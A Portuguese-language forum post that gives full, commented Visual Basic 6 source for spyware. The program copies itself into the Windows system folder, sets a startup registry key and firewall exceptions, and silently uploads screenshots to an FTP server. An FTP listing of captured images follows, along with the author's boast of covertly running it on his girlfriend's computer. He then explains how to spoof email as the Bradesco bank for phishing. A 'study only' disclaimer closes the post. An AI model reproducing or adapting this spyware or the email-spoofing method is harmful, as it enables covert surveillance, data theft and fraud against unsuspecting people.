Outubro 2017
SegTerQuaQuiSexSabDom
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

Calendário Calendário

Buscar
 
 

Resultados por:
 


Rechercher Busca avançada

Últimos assuntos
» matrizes em c
2011-11-10, 13:52 por allanyo

» matriz em c
2011-11-08, 19:02 por allanyo

» matriz em c
2011-11-08, 19:02 por allanyo

» [FUNÇÃO] C
2011-09-25, 15:33 por lucas150992

» Comprare Viagra. da mulher viagra generico
2011-08-04, 09:16 por Convidado

Navegação
 Portal
 Índice
 Membros
 Perfil
 FAQ
 Buscar

ROUBANDO INFORMAÇOES - VB6 - DICA

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

ROUBANDO INFORMAÇOES - VB6 - DICA

Mensagem por Edward Phoenix em 2011-03-30, 12:04

OLA....
VOU COLOCAR AQUI O CODIGO DE UM PROGRAMA QUE GRAVA AS TELAS DE UM COMPUTADOR E ENVIA-AS PRA ALGUM SERVIDOR FTP.
COM ESSE MESMO CONCEITO CONSEGUIMOS ABRIR UM LEQUE DE IDEIAS PARA OBTER INFORMAÇOES ILICITAS DE OUTROS COMPUTADORES.
TAMBEM NESSE TOPICO VOU CITAR COMO ENVIAR UM EMAIL FALSO PRA UMA PESSOA SE PASSANDO POR ALGUMA INSTITUIÇAO OU PESSOAS.

ESSE PROGRAMA FAZ:
- INCIA JUNTO COM WINDOWS
- TEM EXECUÇÃO SILENCIOSA
- NAO É DETECTAVEL
- DESABILITA AQUELA COISA CHATA DO FIREWALL DO WINDOWS "ESSE PROGRAMA ESTA TENTANDO BLA BLA BLA...¬¬'"
- GRAVA AS TELAS DO COMPUTADOR DA SUA NAMORADA OU DO SEU PARTÃO....(HAHAHA)
- ENVIA AS IMAGENS PRA UM SERVIDOR FTP
- (DEPENDENDO DA SUA IMAGINAÇÃO MUDE,CUSTOMIZE O CODIGO =D)

SEGUE O CODIGO COMENTADO:

======================================
'AQUI SÃO AS API'S USADAS PRA PROCESSAR O PROGRAMA
'(GETDESKTOPWINDOW) - CHAMADA PRA CAPTURAR JANELA DO SISTEMA NA DLL USER32
Private Declare Function GetDesktopWindow Lib "user32" () As Long
'MAIS INFORMAÇOES VIDE DOCUMENTAÇÃO DA MICROSOFT
Private Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Private Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Private Declare Function ReleaseDC Lib "user32" (ByVal hwnd As Long, ByVal hdc As Long) As Long
'CHAMADA PRA PEGAR O NOME DO COMPUTADOR
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long
'CONSTANTE COM ENDEREÇO DE DLL PRA OBTER O PRINT
Private Const SRCCOPY = &HCC0020
'VARIAVEIS PUBLICAS
Dim cFalha As Boolean
Dim cCount As Integer
Dim cGuard As Long
Dim cGet As String * 255

Private Sub Form_Load()
'PROCEDIMENTOS ORDENADOS LOGICAMENTE
Call COPIA_EXECUTAVEL
Call OBTEM_NOME_PC
'MODULO ----> ABRE EXCEÇÃO NO FIREWALL DO WINDOWS
'MODULO ----> DEIXA O EXECUTAVEL NO BOOT DO WINDOWS
'-----------------
Call GRAVA_REGISTRO_WINDOWS(2, "", "", "", "")
'-----------------
Call TENTA_CONEXAO
End Sub

Private Sub Inet1_StateChanged(ByVal State As Integer)
On Error Resume Next
'STATUS DO MSINET COM A TENTATIVA DA CONEXAO
Select Case State
Case icDisconnecting
'CASO FOR DESCONECTADO ENTAO PARAR IMEDIATAMENTE O TIMER PRA NAO GERAR UMA EXCEÇÃO E CHAMAR TENTATIVA DE CONEXAO
TIMER_ENVIA.Enabled = False
Call TENTA_CONEXAO
Case icDisconnected
'CASO FOR DESCONECTADO ENTAO PARAR IMEDIATAMENTE O TIMER PRA NAO GERAR UMA EXCEÇÃO E CHAMAR TENTATIVA DE CONEXAO
TIMER_ENVIA.Enabled = False
Call TENTA_CONEXAO
Case icError
'CASO FOR DESCONECTADO ENTAO PARAR IMEDIATAMENTE O TIMER PRA NAO GERAR UMA EXCEÇÃO E CHAMAR TENTATIVA DE CONEXAO
TIMER_ENVIA.Enabled = False
Call TENTA_CONEXAO
Case icResponseCompleted
'CASO O PROCEDIMENTO DE ENVIO TENHA SIDO COM SUCESSO ENTAO APAGAR A IMAGEM GERADA
Kill ("C:\WINDOWS\SYSTEM32\" & "IMG-" & Text1 & "-" & cGuard & ".gif")
'INICIA NOVAMENTE O TIMER
TIMER_ENVIA.Enabled = True
End Select
End Sub


Private Sub TIMER_ENVIA_Timer()
On Error Resume Next
Dim hwnd As Long
'USA A API
hwnd = GetDesktopWindow()
Dim hdc As Long
hdc = GetDC(hwnd)
Dim x As Integer
'CRIAMOS UM ARRAY
Dim cImg(6) As Integer

'CONFIGURAÇOES DE IMAGEM DENTRO DO FORM
Picture1.AutoRedraw = True
Picture1.Width = Screen.Width
Picture1.Height = Screen.Height

BitBlt Picture1.hdc, 0, 0, Screen.Width / Screen.TwipsPerPixelX, Screen.Height / Screen.TwipsPerPixelY, hdc, 0, 0, SRCCOPY

Call ReleaseDC(hwnd, hdc)

'GERA NUMEROS RANDOMICOS PRA SALVAR AS IMAGENS
For x = 1 To 6
Randomize
cImg(x) = 12 * Rnd
Next

'CONCATENA TODOS OS NUMEROS
cGuard = cImg(1) & cImg(2) & cImg(3) & cImg(4) & cImg(5)

'SALVA A IMAGEM LOCAL
SavePicture Picture1.Image, "c:\WINDOWS\SYSTEM32\" & "IMG-" & Text1 & "-" & cGuard & ".gif"

'ENVIA A IMAGEM PRO SERVIDOR
Inet1.Execute , "send c:\WINDOWS\SYSTEM32\" & "IMG-" & Text1 & "-" & cGuard & ".gif" & " //" & "IMG-" & Text1 & "-" & cGuard & ".gif"

End Sub

Private Sub TENTA_CONEXAO()
On Error Resume Next
'LAÇO QUE FICA EM LOOPING ENQUANTO NAO CONSEGUIR FAZER A CONEXAO,ASSIM QUE CONSEGUIR SAI DO LOOPING E FAZ OS PROCEDIMENTOS SEGUINTES..

cFalha = True
Do While cFalha = True
Inet1.URL = "ftp.server.com"
Inet1.UserName = "nome_de_usuario"
Inet1.Password = "minhasenhamudar123"
Inet1.Execute

If (Err.Number <> 35754) Then
' MsgBox ("conectado")
cFalha = False
TIMER_ENVIA.Enabled = True
End If
Loop
End Sub

Private Sub OBTEM_NOME_PC()
'PEGA NOME DO COMPUTADOR
Dim cNome As Long
cNome = GetComputerName(cGet, 1024)
Text1.Text = cGet
End Sub

Private Sub COPIA_EXECUTAVEL()
On Error Resume Next
Dim vAtu As String
Dim vDestino As String
'DIRETORIO ATUAL
vAtu = App.Path & "\" & App.EXEName & ".exe"
'DESTINO
vDestino = Environ("WinDir") & "\" & "system" & "\" & App.EXEName & ".exe"
'SE FOR DIRETORIOS DIFERENTES ENTAO COPIAR
If (UCase(vAtu) <> UCase(vDestino)) Then
FileCopy vAtu, vDestino
End If
End Sub

-----------------------
CODIGO DO MODULO
-----------------------
-----------------------
'API OBTIDA NO SERVIDOR DA MICROSOFT PARA MANIPULAÇAO DE REGISTRO NO WINDOWS
----
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" _
(ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, _
ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As _
Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long

Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal _
hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal _
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" _
(ByVal hKey As Long, ByVal lpValueName As String) As Long

Public Enum T_KeyClasses
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum

Private Const SYNCHRONIZE = &H100000
Private Const STANDARD_RIGHTS_ALL = &H1F0000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_EVENT = &H1
Private Const KEY_NOTIFY = &H10
Private Const READ_CONTROL = &H20000
Private Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Private Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)
Private Const KEY_ALL_ACCESS = ((STANDARD_RIGHTS_ALL Or _
KEY_QUERY_VALUE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY _
Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY Or KEY_CREATE_LINK) _
And (Not SYNCHRONIZE))
Private Const KEY_READ = ((STANDARD_RIGHTS_READ Or _
KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY) _
And (Not SYNCHRONIZE))
Private Const KEY_EXECUTE = (KEY_READ)
Private Const KEY_WRITE = ((STANDARD_RIGHTS_WRITE Or _
KEY_SET_VALUE Or KEY_CREATE_SUB_KEY) And (Not SYNCHRONIZE))
Private Const REG_BINARY = 3
Private Const REG_CREATED_NEW_KEY = &H1
Private Const REG_DWORD = 4
Private Const REG_DWORD_BIG_ENDIAN = 5
Private Const REG_DWORD_LITTLE_ENDIAN = 4
Private Const REG_EXPAND_SZ = 2
Private Const REG_FULL_RESOURCE_DESCRIPTOR = 9
Private Const REG_LINK = 6
Private Const REG_MULTI_SZ = 7
Private Const REG_NONE = 0
Private Const REG_SZ = 1
Private Const REG_NOTIFY_CHANGE_ATTRIBUTES = &H2
Private Const REG_NOTIFY_CHANGE_LAST_SET = &H4
Private Const REG_NOTIFY_CHANGE_NAME = &H1
Private Const REG_NOTIFY_CHANGE_SECURITY = &H8
Private Const REG_OPTION_BACKUP_RESTORE = 4
Private Const REG_OPTION_CREATE_LINK = 2
Private Const REG_OPTION_NON_VOLATILE = 0
Private Const REG_OPTION_RESERVED = 0
Private Const REG_OPTION_VOLATILE = 1
Private Const REG_LEGAL_CHANGE_FILTER = (REG_NOTIFY_CHANGE_NAME _
Or REG_NOTIFY_CHANGE_ATTRIBUTES Or _
REG_NOTIFY_CHANGE_LAST_SET Or _
REG_NOTIFY_CHANGE_SECURITY)
Private Const REG_LEGAL_OPTION = (REG_OPTION_RESERVED Or _
REG_OPTION_NON_VOLATILE Or REG_OPTION_VOLATILE Or _
REG_OPTION_CREATE_LINK Or REG_OPTION_BACKUP_RESTORE)

Public Function SetRegValue(KeyRoot As T_KeyClasses, Path As String, sKey As String, NewValue As String) As Boolean
Dim hKey As Long
Dim KeyValType As Long
Dim KeyValSize As Long
Dim KeyVal As String
Dim tmpVal As String
Dim res As Long
Dim i As Integer
Dim x As Long
res = RegOpenKeyEx(KeyRoot, Path, 0, KEY_ALL_ACCESS, hKey)
If res <> 0 Then GoTo Errore
tmpVal = String(1024, 0)
KeyValSize = 1024
res = RegQueryValueEx(hKey, sKey, 0, KeyValType, tmpVal, KeyValSize)
Select Case res
Case 2
KeyValType = REG_SZ
Case Is <> 0
GoTo Errore
End Select
Select Case KeyValType
Case REG_SZ
tmpVal = NewValue
Case REG_DWORD
x = Val(NewValue)
tmpVal = ""
For i = 0 To 3
tmpVal = tmpVal & Chr(x Mod 256)
x = x \ 256
Next
End Select

KeyValSize = Len(tmpVal)
res = RegSetValueEx(hKey, sKey, 0, KeyValType, tmpVal, KeyValSize)
If res <> 0 Then GoTo Errore
SetRegValue = True
RegCloseKey hKey
Exit Function
Errore:
SetRegValue = False
RegCloseKey hKey
End Function

---
'PROCEDURE PARA MANIPULAR O REGISTRO DO WINDOWS DE ACORDO COM A CHAMADA DENTRO DO FORM
'NA VERDADE IGNORE OS CODIGOS ABAIXO QUE NAO SAO USADOS NESSE PROGRAMA,EU FIZ PARA VARIOS FINS ESSE MODULO...

Sub GRAVA_REGISTRO_WINDOWS(ByVal cFormaConf As Integer, ByVal cSec As String, ByVal cServer As String, ByVal cUser As String, ByVal cPwd As String)
'***** 17/02/2011 - Eduardo
Dim i As Integer
Dim cTam As Integer
Dim cCrypt As Integer
Dim cRecOK As String
'recebe o parametro
If (cFormaConf = 1) Then
'grava servidor,usuario e senha
SaveSetting App.EXEName, "Win Spy Ecra", "ftp", cServer
SaveSetting App.EXEName, "Win Spy Ecra", "user", cUser
SaveSetting App.EXEName, "Win Spy Ecra", "pass", cPwd
'recebe parametro
ElseIf (cFormaConf = 2) Then
'criptografa a senha para acesso
For i = 1 To Len(cSec)
cTam = Asc(Mid(cSec, i, i))
cCrypt = (cTam * 2)
cRecOK = cRecOK & Chr(cCrypt)
Next i
'grava em registro a senha já criptografada
SaveSetting App.EXEName, "Secur", "security", cRecOK
'cria uma regra no firewall do windows xp
SetRegValue
'REGRA FIREWALL WINDOWS XP SP2
HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List", App.Path & "\" & App.EXEName & ".exe", App.Path & "\" & App.EXEName & ".exe" & ":*:Enabled:Redes"
'REGRA FIREWALL WINDOWS XP SP3
SetRegValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile", App.Path & "\" & App.EXEName & ".exe", App.Path & "\" & App.EXEName & ".exe" & ":*:Enabled:Redes"
'recebe parametro
ElseIf (cFormaConf = 3) Then
'faz a gravação de execução
SaveSetting App.EXEName, "Executado", "val", 1
End If
'GRAVA BOOT DO WINDOWS
SetRegValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "" & App.EXEName & "", "c:\windows\system\" & App.EXEName & ".exe"
End Sub

----

EU TESTEI E DEI UM DIR DENTRO DO MEU SERVIDOR DE FTP E VEJA O RESULTADO VIA DOS:

================
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
drwx------ 1 user group 138 Feb 15 03:18 My Documents
drwx------ 1 user group 1889 Feb 15 03:18 My Music
drwx------ 1 user group 3093195 Feb 15 03:18 My Pictures
drwx------ 1 user group 496205 Feb 15 03:18 PublicFolder
drwx------ 1 user group 24332 Feb 15 03:18 wwwhome
drwx------ 1 user group 0 Mar 30 14:54 drivehqshare

-rwx------ 1 user group 2337894 Mar 21 22:36 IMG-MQ01-10011610.
-rwx------ 1 user group 2337894 Mar 21 22:40 IMG-MQ01-101145.gi
-rwx------ 1 user group 2337894 Mar 21 22:42 IMG-MQ01-104862.gi
-rwx------ 1 user group 1048576 Mar 21 22:59 IMG-MQ01-11123210.
-rwx------ 1 user group 2337894 Mar 21 22:53 IMG-MQ01-111688.gi
-rwx------ 1 user group 2337894 Mar 21 22:49 IMG-MQ01-114987.gi
-rwx------ 1 user group 2337894 Mar 21 22:51 IMG-MQ01-18849.gif
-rwx------ 1 user group 2337894 Mar 21 22:29 IMG-MQ01-251110.gi
-rwx------ 1 user group 2337894 Mar 21 22:46 IMG-MQ01-28485.gif
-rwx------ 1 user group 2337894 Mar 21 22:57 IMG-MQ01-311066.gi
-rwx------ 1 user group 2337894 Mar 21 22:47 IMG-MQ01-4100113.g
-rwx------ 1 user group 2337894 Mar 21 22:30 IMG-MQ01-510150.gi
-rwx------ 1 user group 2337894 Mar 21 22:33 IMG-MQ01-541038.gi
-rwx------ 1 user group 2337894 Mar 21 22:35 IMG-MQ01-588125.gi
-rwx------ 1 user group 2337894 Mar 21 22:38 IMG-MQ01-59851.gif
-rwx------ 1 user group 2337894 Mar 21 22:54 IMG-MQ01-6121310.g
-rwx------ 1 user group 2337894 Mar 21 22:39 IMG-MQ01-66732.gif
-rwx------ 1 user group 2337894 Mar 21 22:56 IMG-MQ01-6910119.g
-rwx------ 1 user group 2337894 Mar 21 22:28 IMG-MQ01-76386.gif
-rwx------ 1 user group 2337894 Mar 21 22:43 IMG-MQ01-807811.gi
-rwx------ 1 user group 2337894 Mar 21 22:50 IMG-MQ01-811424.gi
-rwx------ 1 user group 2337894 Mar 21 22:44 IMG-MQ01-8118511.g
-rwx------ 1 user group 2337894 Mar 21 22:32 IMG-MQ01-910410.gi
-rwx------ 1 user group 3047142 Mar 21 20:46 IMG-PHOENIX-109991
-rwx------ 1 user group 0 Mar 21 20:53 IMG-PHOENIX-111081
-rwx------ 1 user group 3047142 Mar 21 20:52 IMG-PHOENIX-111210
-rwx------ 1 user group 1793376 Mar 21 20:54 IMG-PHOENIX-112921
-rwx------ 1 user group 756156 Mar 21 20:55 IMG-PHOENIX-210801
-rwx------ 1 user group 1835008 Mar 21 20:59 IMG-PHOENIX-211131
-rwx------ 1 user group 1474408 Mar 21 20:57 IMG-PHOENIX-321142
-rwx------ 1 user group 3047142 Mar 21 20:36 IMG-PHOENIX-54849.
-rwx------ 1 user group 1131948 Mar 21 20:51 IMG-PHOENIX-65275.
-rwx------ 1 user group 3047142 Mar 21 20:42 IMG-PHOENIX-66821.
-rwx------ 1 user group 3047142 Mar 21 20:49 IMG-PHOENIX-78066.
-rwx------ 1 user group 3047142 Mar 21 20:39 IMG-PHOENIX-898113
-rwx------ 1 user group 3047142 Mar 21 20:44 IMG-PHOENIX-956100
226 Transfer complete
ftp: 5739 bytes recebidos em 0,59Segundos 9,66Kbytes/s.
ftp>
====

PRIMEIRAMENTE EU ENVIEI ESSE MESMO EXECUTAVEL PRA MINHA NAMORADA E ELA EXECUTOU EM UMA LAN HOUSE HAHA!..
PEGUEI TODOS OS LOGS DELA.
SEM A MININA PERSEPÇÃO. XD ( MALANDRAGGEEE )

POSSO TAMBEM FAZER UM KEYLOGGER COM ARQUIVOS DE TEXTOS BEM MAIS LEVES...
UM PROGRAMA DE PHISHING SCAN..

ENTRE VARIOS,PRA MALDADE NÃO HA LIMITES HEHE! Twisted Evil

AGORA VAMOS ENSINAR UMA MANEIRA DE ENVIAR EMAILS SE PASSANDO POR PESSOAS,INSTITUIÇOES E OUTROS.

BAIXEM UM PROGRAMA CHAMADO ''POSTCAST SERVER'' PROCURE AI NO GOOGLE QUE VOCE ACHA.

OLHEM OQUE DA PRA FAZER COM ELE:

====

Bom dia!

Responder |banking@bradesco.com.br para mim
mostrar detalhes 23 fev

VOCE FICOU RICO!
CLIQUE AQUI!

=====

HAHAH! OLHEM O EMAIL..

CARA TO COM PREGUIÇA DE ESCREVER PASSO A PASSO COMO MEXER COM O POST-CAST MAS É BABA..
DIGITA O EMAIL QUE VOCE QUER CLONAR E O EMAIL DA VITIMA..
SIMPLES..

BOM É ISSO DEPOIS EU COLOCO O MEU CASE SOBRE PHISHING DO BRADESCO.MUITO BOM!

CARA NAO PASSO O PROJETO PRONTO....ESTUDE PORRA!....COPIA E COLA VOCE NAO APRENDE!

---

JAMAIS TENHO A INTENÇÃO DE ESTIMULAR O CRIME VIRTUAL
ESSE MATERIAL É APENAS PARA ESTUDOS
E EU NAO ME RESPONSABILIZO POR PREJUIZOS FUTUROS CAUSADOS
POR PESSOAS QUE LERAM ESSE POST.




FONTE:
EU MESMO


EDUARDO..
PHOENIX
ABRAÇOS
avatar
Edward Phoenix

Mensagens : 34
Pontos : 86
Data de inscrição : 22/02/2010
Idade : 27

Ver perfil do usuário

Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum